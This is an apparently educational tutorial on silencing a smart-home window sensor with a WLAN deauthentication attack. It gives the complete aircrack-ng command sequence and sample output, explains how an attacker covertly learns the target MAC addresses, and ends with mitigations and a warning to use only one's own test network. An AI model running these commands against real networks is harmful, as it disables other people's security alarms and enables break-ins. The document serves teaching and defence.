One Way to disable an IoT device is by disconnecting it from the network. If it can't report a status change, like the opening of a window, our security system can't report the change to the system owner. There are two methods to achieve this, one is to block the wlan frequencies completely with a jammer. But this would lead to a widespread disruption in services and be easily detectable by all in the area. A better solution is to selectively block the single device which monitors the window. For that we can use a maintenance frame in the WLAN protocol. This function allows us to tell a device to disconnect from the network. Since the frame doesn't use any encryption, it can be easily faked. By repeatedly sending this frame we essentially execute a denial of service attack on the IoT device and block it from reporting back.

1. Your own test network with our smarthome example project setup. Never attempt this on a network that you do not own.
2. The MAC address of your IoT device and the BSSID (Mac address) of your router from your test network
3. A notebook, preferable with a Linux system and WLAN capable to simulate the attacker and the Linux packet aircrack-ng installed You can install it with sudo apt-get install aircrack-ng

Important: Use only your own test network or networks you have permission from the owner to attack

0. run sudo airmon-ng check and note down the processes to restart them after you are done with the attack(so that you don't have to restart your computer to get back wifi)

1. kill all other processes which currently use your WLAN adapter.

> sudo airmon-ng check kill

Killing these processes:

  PID Name
 3553 avahi-daemon
 3557 avahi-daemon

2. identify wlan adapter run the command

> iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  Mode:Master  Tx-Power=31 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

It will show you a list of your network interfaces. Identify your WLAN adapter and note it down. Usually the adapter is called wlan0.

3. Identify the WLAN network run the commands

> sudo airmon-ng start [wlan adapter]

This will put your WLAN adapter into monitoring mode. It might be that your old device vanishes and a new one appears. For example wlp4s0 might change to wlp4s0mon. You should check again with iwconfig, and use the monitor device should it appear.

> sudo airodump-ng [wlan adapter]

This will show you a list of all active WLAN networks. Note down the BSSID and channel(CH) of your test network. Alternatively you can look up the MAC address of your network on your router. airodump-ng will look something like this:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                       
 B8:27:EB:84:DF:AB  -45       25        0    0   5  54e  WPA2 CCMP   PSK  PiLantestbla                 
 C0:25:06:F8:2D:F3  -62        9        0    0   6  54e. WPA2 CCMP   PSK  borganer            
 C0:C9:E3:29:7E:56  -76       16        0    0   1  54e. WPA2 CCMP   PSK  Mirs                         
 C6:C9:E3:29:7E:56  -76       16        0    0   1  54e. WPA2 CCMP   PSK  <length:  0>                 
 9C:C7:A6:64:EB:69  -76       13        0    0  11  54e. WPA2 CCMP   PSK  galan              
 C0:C9:E3:29:7C:F2  -83       13        0    0   1  54e. WPA2 CCMP   PSK  Mirs                         
 C6:C9:E3:29:7C:F2  -84        8        0    0   1  54e. WPA2 CCMP   PSK  <length:  0>                 
 4C:09:D4:2A:9B:F4  -89        2        0    0   1  54e  WPA2 CCMP   PSK  EasyBox-2A9B36               
 00:24:FE:AC:7A:AF  -91        5        0    0   6  54e. WPA2 CCMP   PSK  E_G 

4. Identify the device MAC adress.

Go to your test network router and look up the MAC address of your target device. Alternativly you can run ping [device ip] and then arp -a and the mac address should be listed there.

4.5 Optional? step

For me it only worked if you also specify the channel when putting the WLAN adapter into monitoring mode, but this might be unnecessary for you:

sudo airmon-ng stop [WLAN adapter]
sudo airmon-ng start [WLAN adapter] [Channel]

5. Start the WLAN deauthentication attack.

> sudo aireplay-ng -D [WLAN adapter] -0 0 -a [MAC-WLAN (BSSID)] -c [MAC iot-device]

The IoT device is now blocked. You can stop the attack by pressing ctrl-c

6. Getting your wifi back

To get your WLAN back after sudo airmon-ng check kill sometimes you might have to restart your computer. However, what worked for me is sudo airmon-ng stop [WLAN adapter] to put your device back into managed mode, then sudo service NetworkManager restart and sudo service wpa_supplicant restart, and possibly restarting other services killed by sudo airmon-ng check kill

Should you receive a message like

13:20:35  Waiting for beacon frame (BSSID: B2:05:25:78:B2:08) on channel 6
13:20:45  No such BSSID available.

you might be listening on the wrong channel. First make sure that all processes on your WLAN interface are killed (see Point 1). run the command multiple times until no processes get listed in new try. Set the channel with the command sudo iwconfig [wlan adapter] channel [channel number] to the channel you noted down before. Retry the attack from point 5.

New model devices either use a diffrent WLAN standard which uses protected maintenace frames or simply ignore (or limit the number of acknowledged) deauthentification frames. In both cases you likely receive an output like this:

13:50:25  Waiting for beacon frame (BSSID: B8:27:EB:84:DF:AB) on channel 5
13:50:26  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:26  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:27  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:27  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 2|64 ACKs]
13:50:28  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:28  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:29  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]
13:50:29  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 1|64 ACKs]
13:50:30  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 1|64 ACKs]
13:50:30  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 1|64 ACKs]
13:50:31  Sending 64 directed DeAuth. STMAC: [E0:40:07:FC:1A:6C] [ 0|64 ACKs]

The low number if received ACKs (here mostly around 0) shows that the sent frames are ignored by the device. Congratulations a security feature defeated you.

As you have noticed, to successfully attack and block the specific device you would need to know the MAC adress and the MAC address of the network. For that an attacker would start by exploring the local networks with a wifi network explorer application. There is a number of free applications available for all operating systems.

Once the attacker knows the network and channel said network operates on, the attacker can simply start monitoring the local networks with the command

airmon-ng start [wlan-adapter] [channel]

and save the data on the local machine with

airodump-ng -c [channel] --bssid [MAC-WLAN (BSSID)] -w [filename] [wlan-adapter]

at home the attacker then can use tools like Wireshark to analyze the collected data and identify the desired IoT devices. This can even be made easier by correlating data, such as a timestamp when the window was opened. Since the MAC address of the device is not encrypted, it can be simply read and the attacker has now everything to start the attack.

Use state of the art WLAN Standards and disable Support for old standards whenever possible. Make sure you have good WLAN Radio strength in areas where you use WLAN. The attack gets more difficult the stronger the WLAN signal is and forces the attacker to start the attack from a closer physical location, thus making it easier to detect. If you suspect such an attack against your network, record your own network traffic and analyze if large amounts of deauthentification packages are being sent.